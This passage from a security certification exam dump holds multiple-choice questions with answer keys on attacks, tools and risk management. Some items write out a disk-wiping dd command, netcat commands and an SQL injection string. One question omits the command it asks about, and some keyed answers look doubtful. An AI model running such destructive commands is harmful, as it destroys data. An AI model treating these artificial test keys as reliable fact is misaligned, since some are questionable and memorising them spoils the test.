B. The tester must use the tool inSSIDer to crack it using the ESSID of the network.
C. The tester cannot crack WPA2 because it is in full compliance with the IEEE 802.11i standard.
D. The tester must change the MAC address of the wireless network card and then use the AirTraf tool to
obtain the key.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 550
Which type of antenna is used in wireless communication?

A. Omnidirectional
B. Parabolic
C. Uni-directional
D. Bi-directional

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 551
In the context of Trojans, what is the definition of a Wrapper?

A. An encryption tool to protect the Trojan.
B. A tool used to bind the Trojan with a legitimate file.
C. A tool used to encapsulate packets within a new header and footer.
D. A tool used to calculate bandwidth and CPU cycles wasted by the Trojan.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 552
A Security Engineer at a medium-sized accounting firm has been tasked with discovering how much
information can be obtained from the firm's public-facing web servers. The engineer decides to start by using
netcat to connect to port 80.
The engineer receives this output:

HTTP/1.1 200 OK
Server: Microsoft-IIS/6
Expires: Tue, 17 Jan 2011 01:41:33 GMT
Date: Mon, 16 Jan 2011 01:41:33 GMT
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Wed, 28 Dec 2010 15:32:21 GMT
ETag: "b0aac0542e25c31:89d"
Content-Length: 7369

Which of the following is an example of what the engineer performed?

A. Cross-site scripting
B. Banner grabbing
C. SQL injection
D. Whois database query

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 553
An NMAP scan of a server shows port 69 is open. What risk could this pose?

A. Unauthenticated access
B. Weak SSL version
C. Cleartext login
D. Web portal data leak

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 554
What information should an IT system analysis provide to the risk assessor?

A. Management buy-in
B. Threat statement
C. Security architecture
D. Impact analysis

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 555
Which results will be returned with the following Google search query?

site:target.com -site:Marketing.target.com accounting

A. Results matching all words in the query
B. Results matching "accounting" in domain target.com but not on the site Marketing.target.com
C. Results from matches on the site marketing.target.com that are in the domain target.com but do not include
the word accounting
D. Results for matches on target.com and Marketing.target.com that include the word "accounting"

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 556
A bank stores and processes sensitive privacy information related to home loans. However, auditing has never
been enabled on the system. What is the first step that the bank should take before enabling the audit feature?

A. Perform a vulnerability scan of the system.
B. Determine the impact of enabling the audit feature.
C. Perform a cost/benefit analysis of the audit feature.
D. Allocate funds for staffing of audit log review.

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 557
Which of the following is a preventive control?

A. Smart card authentication
B. Security policy
C. Audit trail
D. Continuity of operations plan

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 558
Which of the following is considered an acceptable option when managing a risk?

A. Reject the risk.
B. Deny the risk.
C. Mitigate the risk.
D. Initiate the risk.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 559
Which security control role does encryption meet?

A. Preventative
B. Detective
C. Offensive
D. Defensive

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 560
A covert channel is a channel that

A. transfers information over, within a computer system, or network that is outside of the security policy.
B. transfers information over, within a computer system, or network that is within the security policy.
C. transfers information via a communication path within a computer system, or network for transfer of data.
D. transfers information over, within a computer system, or network that is encrypted.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 561
John the Ripper is a technical assessment tool used to test the weakness of which of the following?

A. Usernames
B. File permissions
C. Firewall rulesets
D. Passwords

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 562
Least privilege is a security concept that requires that a user is

A. limited to those functions required to do the job.
B. given root or administrative privileges.
C. trusted to keep all data and access to that data under their sole control.
D. given privileges equal to everyone else in the department.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 563
If the final set of security controls does not eliminate all risk in a system, what could be done next?

A. Continue to apply controls until there is zero risk.
B. Ignore any remaining risk.
C. If the residual risk is low enough, it can be accepted.
D. Remove current controls since they are not completely effective.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 564
What is one thing a tester can do to ensure that the software is trusted and is not changing or tampering with
critical data on the back end of a system it is loaded on?

A. Proper testing
B. Secure coding principles
C. Systems security and architecture review
D. Analysis of interrupts within the software

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 565
Which of the following examples best represents a logical or technical control?

A. Security tokens
B. Heating and air conditioning
C. Smoke and fire alarms
D. Corporate security policy

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 566
Michael is the security administrator for the ABC company. Michael has been charged with strengthening
the company's security policies, including its password policies. Due to certain legacy applications, Michael was
only able to enforce a password group policy in Active Directory with a minimum of 10 characters. He has
informed the company's employees, however, that the new password policy requires that everyone must have
complex passwords with at least 14 characters. Michael wants to ensure that everyone is using complex
passwords that meet the new security policy requirements. Michael has just logged on to one of the network's
domain controllers and is about to run the following command:

What will this command accomplish?

A. Dumps SAM password hashes to pwd.txt
B. Password history file is piped to pwd.txt
C. Dumps Active Directory password hashes to pwd.txt
D. Internet cache file is piped to pwd.txt

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 567
You have successfully brute-forced basic authentication configured on a Web Server using the Brutus hacking tool.
The username/password is "Admin" and "Bettlemani@". You log on to the system using the brute-forced
password and plant backdoors and rootkits.

After downloading various sensitive documents from the compromised machine, you proceed to clear the log
files to hide your trace. Which event log located at C:\Windows\system32\config contains the trace of your
brute force attempts?

A. AppEvent.Evt
B. SecEvent.Evt
C. SysEvent.Evt
D. WinEvent.Evt

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 568
Assuming two systems are using IPSec to protect traffic over the Internet, what type of general attack could
compromise the data?

A. Spoof Attack
B. Smurf Attack
C. Man in the Middle Attack
D. Trojan Horse Attack
E. Back Orifice Attack

Correct Answer: DE
Section: (none)
Explanation

Explanation/Reference:

QUESTION 569
What is a Trojan Horse?

A. A malicious program that captures your username and password
B. Malicious code masquerading as or replacing legitimate code
C. An unauthorized user who gains access to your user database and adds themselves as a user
D. A server that is to be sacrificed to all hacking attempts in order to log and monitor the hacking activity

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 570
You want to use netcat to generate a huge amount of useless network data continuously for various performance
testing between 2 hosts. Which of the following commands accomplish this?

A. Machine A
#yes AAAAAAAAAAAAAAAAAAAAAA | nc -v -v -l -p 2222 > /dev/null
Machine B
#yes BBBBBBBBBBBBBBBBBBBBBB | nc machinea 2222 > /dev/null
B. Machine A
cat somefile | nc -v -v -l -p 2222
Machine B
cat somefile | nc othermachine 2222
C. Machine A
nc -l -p 1234 | uncompress -c | tar xvfp
Machine B
tar cfp - /some/dir | compress -c | nc -w 3 machinea 1234
D. Machine A
while true : do
nc -v -l -s -p 6000 machineb 2
Machine B
while true ; do
nc -v -l -s -p 6000 machinea 2
done

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 571
Travis works primarily from home as a medical transcriptionist.

He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM. He uses voice recognition
software, which is processor intensive, which is why he bought the new computer. Travis frequently has to get on the
Internet to do research on what he is working on. After about two months of working on his new computer, he
notices that it is not running nearly as fast as it used to.

Travis uses antivirus software, anti-spyware software and always keeps the computer up-to-date with Microsoft
patches.

After another month of working on the computer, Travis's computer is even more noticeably slow. Every once in
a while, Travis also notices a window or two pop up on his screen, but they quickly disappear. He has seen
these windows show up even when he has not been on the Internet. Travis is really worried about his computer
because he spent a lot of money on it and he depends on it to work. Travis scans his computer through Windows
Explorer and checks out the file system, folder by folder, to see if there is anything he can find. He spends over
four hours poring over the files and folders and can't find anything, but before he gives up, he notices that his
computer only has about 10 GB of free space available. Since his drive is a 200 GB hard drive, Travis thinks
this is very odd.

Travis downloads Space Monger and adds up the sizes for all the folders and files on his computer. According
to his calculations, he should have around 150 GB of free space.
What is most likely the cause of Travis's problems?

A. Travis's computer is infected with a stealth kernel-level rootkit
B. Travis's computer is infected with a stealth Trojan virus
C. Travis's computer is infected with a self-replicating worm that fills the hard disk space
D. A logic bomb triggered at random times is creating hidden, data-consuming junk files

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 572
Which of the following is an attack in which a secret value like a hash is captured and then reused at a later
time to gain access to a system without ever decrypting or decoding the hash?

A. Replay Attacks
B. Brute Force Attacks
C. Cryptography Attacks
D. John the Ripper Attacks

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 573
You are the IT Manager of a large legal firm in California. Your firm represents many important clients whose
names always must remain anonymous to the public. Your boss, Mr. Smith is always concerned about client
information being leaked or revealed to the press or public. You have just finished a complete security overhaul
of your information system including an updated IPS, new firewall, email encryption and employee security
awareness training. Unfortunately, many of your firm's clients do not trust technology to completely secure their
information, so couriers routinely have to travel back and forth to and from the office with sensitive information.

Your boss has charged you with figuring out how to secure the information the couriers must transport. You
propose that the data be transferred using burned CDs or USB flash drives. You initially think of encrypting the
files, but decide against that method for fear the encryption keys could eventually be broken.

What software application could you use to hide the data on the CD's and USB flash drives?

A. Snow
B. File Snuff
C. File Sneaker
D. EFS

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 574
You are the security administrator for a large online auction company based out of Los Angeles. After getting
your ENSA certification last year, you have steadily been fortifying your network's security, including
training, OS hardening and network security. One of the last things you just changed for security reasons was to
rename all the built-in administrator accounts on the local computers of PCs and in Active Directory. After
thorough testing, you found that no services or programs were affected by the name changes.

Your company undergoes an outside security audit by a consulting company, and they said that even though all
the administrator account names were changed, the accounts could still be used by a clever hacker to gain
unauthorized access. You argue with the auditors and say that is not possible, so they use a tool and show you
how easy it is to utilize the administrator account even though its name was changed.

What tool did the auditors use?

A. sid2user
B. User2sid
C. GetAcct
D. Fingerprint

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 575
John Beetlesman, the hacker, has successfully compromised the Linux system of Agent Telecommunications,
Inc.'s web server running Apache. He has downloaded sensitive documents and database files off the machine.

Upon performing various tasks, Beetlesman finally runs the following command on the Linux box
before disconnecting:

for ((i=0;i<1;i++));do
dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda
done

What exactly is John trying to do?

A. He is making a bit stream copy of the entire hard disk for later download
B. He is deleting log files to remove his trace
C. He is wiping the contents of the hard disk with zeros
D. He is infecting the hard disk with random virus strings

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 576
LAN Manager passwords are concatenated to 14 bytes and split in half. The two halves are hashed individually.
If the password is 7 characters or less, then the second half of the hash is always:

A. 0xAAD3B435B51404EE
B. 0xAAD3B435B51404AA
C. 0xAAD3B435B51404BB
D. 0xAAD3B435B51404CC

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 577
Which of the following is the successor of SSL?

A. TLS
B. RSA
C. GRE
D. IPSec

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 578
You are attempting to man-in-the-middle a session. Which protocol will allow you to guess a sequence
number?

A. TCP
B. UDP
C. ICMP
D. UPX

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 579
Your team has won a contract to infiltrate an organization. The company wants to have the attack be as realistic
as possible; therefore, they did not provide any information besides the company name.

What should be the first step in security testing the client?

A. Reconnaissance
B. Enumeration
C. Scanning
D. Escalation

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 580
Which regulation defines security and privacy controls for Federal information systems and organizations?

A. NIST-800-53
B. PCI-DSS
C. EU Safe Harbor
D. HIPAA

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 581
How does the Address Resolution Protocol (ARP) work?

A. It sends a request packet to all the network elements, asking for the MAC address from a specific IP.
B. It sends a reply packet to all the network elements, asking for the MAC address from a specific IP.
C. It sends a reply packet for a specific IP, asking for the MAC address.
D. It sends a request packet to all the network elements, asking for the domain name from a specific IP.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 582
Which of the following is a design pattern based on distinct pieces of software providing application functionality
as services to other applications?

A. Service Oriented Architecture
B. Object Oriented Architecture
C. Lean Coding
D. Agile Process

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 583
Which mode of IPSec should you use to assure security and confidentiality of data within the same LAN?

A. ESP transport mode
B. AH promiscuous
C. ESP confidential
D. AH Tunnel mode

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 584
Which of the following is assured by the use of a hash?

A. Integrity
B. Confidentiality
C. Authentication
D. Availability

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 585
Which of the following is the greatest threat posed by backups?

A. A backup is the source of Malware or illicit information.
B. A backup is unavailable during disaster recovery.
C. A backup is incomplete because no verification was performed.
D. An un-encrypted backup can be misplaced or stolen.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 586
An incident investigator asks to receive a copy of the event logs from all firewalls, proxy servers, and Intrusion
Detection Systems (IDS) on the network of an organization that has experienced a possible breach of security.
When the investigator attempts to correlate the information in all of the logs, the sequence of many of the
logged events does not match up.

What is the most likely cause?

A. The network devices are not all synchronized.
B. Proper chain of custody was not observed while collecting the logs.
C. The attacker altered or erased events from the logs.
D. The security breach was a false positive.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 587
In Risk Management, how is the term "likelihood" related to the concept of "threat?"

A. Likelihood is the probability that a threat-source will exploit a vulnerability.
B. Likelihood is a possible threat-source that may exploit a vulnerability.
C. Likelihood is the likely source of a threat that could exploit a vulnerability.
D. Likelihood is the probability that a vulnerability is a threat-source.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 588
The chance of a hard drive failure is once every three years. The cost to buy a new hard drive is $300. It will
require 10 hours to restore the OS and software to the new hard disk. It will require a further 4 hours to restore
the database from the last backup to the new hard disk. The recovery person earns $10/hour.
Calculate the SLE, ARO, and ALE. Assume the EF = 1 (100%).

What is the closest approximate cost of this replacement and recovery operation per year?

A. $146
B. $1320
C. $440
D. $100

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 589
A network administrator discovers several unknown files in the root directory of his Linux FTP server. One of
the files is a tarball, two are shell script files, and the third is a binary file named "nc." The FTP server's
access logs show that the anonymous user account logged in to the server, uploaded the files, extracted
the contents of the tarball and ran the script using a function provided by the FTP server's software. The ps
command shows that the nc file is running as a process, and the netstat command shows the nc process is
listening on a network port.

What kind of vulnerability must be present to make this remote attack possible?

A. File system permissions
B. Privilege escalation
C. Directory traversal
D. Brute force login

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 590
While performing online banking using a Web browser, a user receives an email that contains a link to an
interesting Web site. When the user clicks on the link, another Web browser session starts and displays a
video of cats playing a piano. The next business day, the user receives what looks like an email from his
bank, indicating that his bank account has been accessed from a foreign country. The email asks the user to
call his bank and verify the authorization of a funds transfer that took place.

What Web browser-based security vulnerability was exploited to compromise the user?

A. Cross-Site Request Forgery
B. Cross-Site Scripting
C. Clickjacking
D. Web form input validation

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 591
A company's security policy states that all Web browsers must automatically delete their HTTP browser cookies
upon terminating. What sort of security breach is this policy attempting to mitigate?

A. Attempts by attackers to access Web sites that trust the Web browser user by stealing the user's
authentication credentials.
B. Attempts by attackers to access the user and password information stored in the company's SQL database.
C. Attempts by attackers to access passwords stored on the user's computer without the user's knowledge.
D. Attempts by attackers to determine the user's Web browser usage patterns, including when sites were
visited and for how long.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 592
A company's Web development team has become aware of a certain type of security vulnerability in their Web
software. To mitigate the possibility of this vulnerability being exploited, the team wants to modify the software
requirements to disallow users from entering HTML as input into their Web application.

What kind of Web application vulnerability likely exists in their software?

A. Cross-site scripting vulnerability
B. Cross-site Request Forgery vulnerability
C. SQL injection vulnerability
D. Web site defacement vulnerability

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 593
Which of the following is considered the best way to protect Personally Identifiable Information (PII) from Web
application vulnerabilities?

A. Use cryptographic storage to store all PII
B. Use encrypted communications protocols to transmit PII
C. Use full disk encryption on all hard drives to protect PII
D. Use a security token to log into all Web applications that use PII

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 594
Which of the following is one of the most effective ways to prevent Cross-site Scripting (XSS) flaws in software
applications?

A. Validate and escape all information sent to a server
B. Use security policies and procedures to define and implement proper security settings
C. Verify access right before allowing access to protected information and UI controls
D. Use digital certificates to authenticate a server prior to sending data

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 595
An Internet Service Provider (ISP) has a need to authenticate users connecting using analog modems, Digital
Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay
network.

Which AAA protocol is most likely able to handle this requirement?

A. RADIUS
B. DIAMETER
C. Kerberos
D. TACACS+

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 596
A new wireless client is configured to join a 802.11 network. This client uses the same hardware and software
as many of the other clients on the network. The client can see the network, but cannot connect. A wireless
packet sniffer shows that the Wireless Access Point (WAP) is not responding to the association requests being
sent by the wireless client.

What is a possible source of this problem?

A. The WAP does not recognize the client's MAC address
B. The client cannot see the SSID of the wireless network
C. Client is configured for the wrong channel
D. The wireless client is not configured to use DHCP

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 597
An Intrusion Detection System (IDS) has alerted the network administrator to a possibly malicious sequence of
packets sent to a Web server in the network's external DMZ. The packet traffic was captured by the IDS and
saved to a PCAP file.

What type of network tool can be used to determine if these packets are genuinely malicious or simply a false
positive?

A. Protocol analyzer
B. Intrusion Prevention System (IPS)
C. Network sniffer
D. Vulnerability scanner

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 598
An attacker gains access to a Web server's database and displays the contents of the table that holds all of the
names, passwords, and other user information. The attacker did this by entering information into the Web site's
user login page that the software's designers did not expect to be entered. This is an example of what kind of
software design problem?

A. Insufficient input validation
B. Insufficient exception handling
C. Insufficient database hardening
D. Insufficient security management

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 599
Which of the following is a protocol specifically designed for transporting event messages?

A. SYSLOG
B. SMS
C. SNMP
D. ICMP

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 600
Which of the following security operations is used for determining the attack surface of an organization?

A. Running a network scan to detect network services in the corporate DMZ
B. Training employees on the security policy regarding social engineering
C. Reviewing the need for a security clearance for each employee
D. Using configuration management to determine when and where to apply security patches

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 601
The security concept of "separation of duties" is most similar to the operation of which type of security device?

A. Firewall
B. Bastion host
C. Intrusion Detection System
D. Honeypot

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 602
The "black box testing" methodology enforces which kind of restriction?

A. Only the external operation of a system is accessible to the tester.
B. Only the internal operation of a system is known to the tester.
C. The internal operation of a system is only partly accessible to the tester.
D. The internal operation of a system is completely known to the tester.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 603
The "gray box testing" methodology enforces what kind of restriction?

A. The internal operation of a system is only partly accessible to the tester.
B. The internal operation of a system is completely known to the tester.
C. Only the external operation of a system is accessible to the tester.
D. Only the internal operation of a system is known to the tester.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 604
The "white box testing" methodology enforces what kind of restriction?

A. The internal operation of a system is completely known to the tester.
B. Only the external operation of a system is accessible to the tester.
C. Only the internal operation of a system is known to the tester.
D. The internal operation of a system is only partly accessible to the tester.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 605
To determine if a software program properly handles a wide range of invalid input, a form of automated testing
can be used to randomly generate invalid input in an attempt to crash the program.

What term is commonly used when referring to this type of testing?

A. Fuzzing
B. Randomizing
C. Mutating
D. Bounding

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 606
To maintain compliance with regulatory requirements, a security audit of the systems on a network must be
performed to determine their compliance with security policies. Which one of the following tools would most
likely be used in such an audit?

A. Vulnerability scanner
B. Protocol analyzer
C. Port scanner
D. Intrusion Detection System

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 607
Which of these options is the most secure procedure for storing backup tapes?

A. In a climate controlled facility offsite
B. On a different floor in the same building
C. Inside the data center for faster retrieval in a fireproof safe
D. In a cool dry environment

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 608
What term describes the amount of risk that remains after the vulnerabilities are classified and the
countermeasures have been deployed?

A. Residual risk
B. Inherent risk
C. Deferred risk
D. Impact risk

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 609
Risks = Threats x Vulnerabilities is referred to as the:

A. Risk equation
B. Threat assessment
C. BIA equation
D. Disaster recovery formula

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 610
Which of the following is designed to identify malicious attempts to penetrate systems?

A. Intrusion Detection System
B. Firewall
C. Proxy
D. Router

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 611
Which of the following is a low-tech way of gaining unauthorized access to systems?

A. Social Engineering
B. Sniffing
C. Eavesdropping
D. Scanning

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 612
PGP, SSL, and IKE are all examples of which type of cryptography?

A. Public Key
B. Secret Key
C. Hash Algorithm
D. Digest

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 613
Which method of password cracking takes the most time and effort?

A. Brute force
B. Rainbow tables
C. Dictionary attack
D. Shoulder surfing

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 614
What is the most common method to exploit the "Bash Bug" or "ShellShock" vulnerability?

A. Through Web servers utilizing CGI (Common Gateway Interface) to send a malformed environment variable
to a vulnerable Web server
B. Manipulate format strings in text fields
C. SSH
D. SYN Flood

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 615
Which of the following tools performs comprehensive tests against web servers, including dangerous files and
CGIs?

A. Nikto
B. Snort
C. John the Ripper
D. Dsniff

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 616
Which of the following tools is used to analyze the files produced by several packet-capture programs such as
tcpdump, WinDump, Wireshark, and EtherPeek?

A. tcptrace
B. tcptraceroute
C. Nessus
D. OpenVAS

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 617
Which of the following tools is used to detect wireless LANs using the 802.11a/b/g/n WLAN standards on a
Linux platform?

A. Kismet
B. Nessus
C. Netstumbler
D. Abel

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 618
Session splicing is an IDS evasion technique in which an attacker delivers data in multiple, small-sized packets
to the target computer, making it very difficult for an IDS to detect the attack signatures.

Which tool can be used to perform session splicing attacks?

A. Whisker
B. tcpsplice
C. Burp
D. Hydra

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 619
Which of the following tools can be used for passive OS fingerprinting?

A. tcpdump
B. nmap
C. ping
D. tracert

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 620
You are the Systems Administrator for a large corporate organization. You need to monitor all network traffic on
your local network for suspicious activities and receive notifications when an attack is occurring. Which tool
would allow you to accomplish this goal?

A. Network-based IDS
B. Firewall
C. Proxy
D. Host-based IDS

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 621
What does a firewall check to prevent particular ports and applications from getting packets into an
organization?

A. Transport layer port numbers and application layer headers
B. Presentation layer headers and the session layer port numbers
C. Network layer headers and the session layer port numbers
D. Application layer port numbers and the transport layer headers

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 622
You work as a Security Analyst for a retail organization. In securing the company's network, you set up a
firewall and an IDS. However, hackers are able to attack the network. After investigating, you discover that your
IDS is not configured properly and therefore is unable to trigger alarms when needed. What type of alert is the
IDS giving?

A. False Negative
B. False Positive
C. True Negative
D. True Positive

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 623
Which of the following types of firewalls ensures that the packets are part of the established session?

A. Stateful inspection firewall
B. Circuit-level firewall
C. Application-level firewall
D. Switch-level firewall

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 624
Which of the following incident handling process phases is responsible for defining rules, organizing the human
workforce, creating a back-up plan, and testing the plans for an organization?

A. Preparation phase
B. Containment phase
C. Identification phase
D. Recovery phase

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 625
Ricardo wants to send secret messages to a competitor company. To secure these messages, he uses a
technique of hiding a secret message within an ordinary message. The technique provides 'security through
obscurity'.

What technique is Ricardo using?

A. Steganography
B. Public-key cryptography
C. RSA algorithm
D. Encryption

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 626
During a security audit of IT processes, an IS auditor found that there were no documented security
procedures. What should the IS auditor do?

A. Identify and evaluate existing practices
B. Create a procedures document
C. Conduct compliance testing
D. Terminate the audit

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 627
Which of the following statements regarding ethical hacking is incorrect?

A. Ethical hackers should never use tools or methods that have the potential of exploiting vulnerabilities in an
organization's systems.
B. Testing should be remotely performed offsite.
C. An organization should use ethical hackers who do not sell vendor hardware/software or other consulting
services.
D. Ethical hacking should not involve writing to or modifying the target systems.

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 628
Craig received a report of all the computers on the network that showed all the missing patches and weak
passwords. What type of software generated this report?

A. a port scanner
B. a vulnerability scanner
C. a virus scanner
D. a malware scanner

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 629
Sophia travels a lot and worries that her laptop containing confidential documents might be stolen. What is the
best protection that will work for her?

A. Password protected files
B. Hidden folders
C. BIOS password
D. Full disk encryption.

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 630
The network in ABC company is using the network address 192.168.1.64 with mask 255.255.255.192. In the
network the servers are in the addresses 192.168.1.122, 192.168.1.123 and 192.168.1.124.

An attacker is trying to find those servers but he cannot see them in his scanning. The command he is using
is: nmap 192.168.1.64/28.

Why can he not see the servers?

A. The network must be down and the nmap command and IP address are ok.
B. He needs to add the command 'ip address' just before the IP address.
C. He is scanning from 192.168.1.64 to 192.168.1.78 because of the mask /28 and the servers are not in that
range.
D. He needs to change the address to 192.168.1.0 with the same mask.

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 631
An unauthorized individual enters a building following an employee through the employee entrance after the
lunch rush. What type of breach has the individual just performed?

A. Reverse Social Engineering
B. Tailgating
C. Piggybacking
D. Announced

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 632
Which of the following is the best countermeasure to encrypting ransomware?

A. Use multiple antivirus programs
B. Keep several generations of off-line backups
C. Analyze the ransomware to get decryption key of encrypted data
D. Pay a ransom

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 633
If an attacker uses the command SELECT * FROM user WHERE name = 'x' AND userid IS NULL; --'; which
type of SQL injection attack is the attacker performing?

A. End of Line Comment
B. UNION SQL Injection
C. Illegal/Logically Incorrect Query
D. Tautology

Correct Answer: C
Section: (none)
Explanation

Explanation/Reference:

QUESTION 634
Sophia travels a lot and worries that her laptop containing confidential documents might be stolen. What is the
best protection that will work for her?

A. Full Disk encryption
B. BIOS password
C. Hidden folders
D. Password protected files

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:

QUESTION 635
An attacker has installed a RAT on a host. The attacker wants to ensure that when a user attempts to go to
"www.MyPersonalBank.com", that the user is directed to a phishing site.
Which file does the attacker need to modify?

A. Boot.ini
B. Sudoers
C. Networks
D. Hosts

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 636
Which of the following options represents a conceptual characteristic of an anomaly-based IDS over a
signature-based IDS?

A. Produces fewer false positives
B. Can identify unknown attacks
C. Requires vendor updates for a new threat
D. Cannot deal with encrypted network traffic

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 637
You are logged in as a local admin on a Windows 7 system and you need to launch the Computer Management
Console from command line.
Which command would you use?

A. c:\gpedit
B. c:\compmgmt.msc
C. c:\ncpa.cp
D. c:\services.msc

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 638
Which of the following acts requires employers to use standard national numbers to identify them on standard
transactions?

A. SOX
B. HIPAA
C. DMCA
D. PCI-DSS

Correct Answer: B
Section: (none)
Explanation

Explanation/Reference:

QUESTION 639
In Wireshark, the packet bytes pane shows the data of the current packet in which format?

A. Decimal
B. ASCII only
C. Binary
D. Hexadecimal

Correct Answer: D
Section: (none)
Explanation

Explanation/Reference:

QUESTION 640
Which of the following is a set of extensions to DNS that provides origin authentication of DNS data to DNS
clients (resolvers) so as to reduce the threat of DNS poisoning, spoofing, and similar types of attacks?

A. DNSSEC
B. Resource records
C. Resource transfer
D. Zone transfer

Correct Answer: A
Section: (none)
Explanation

Explanation/Reference:
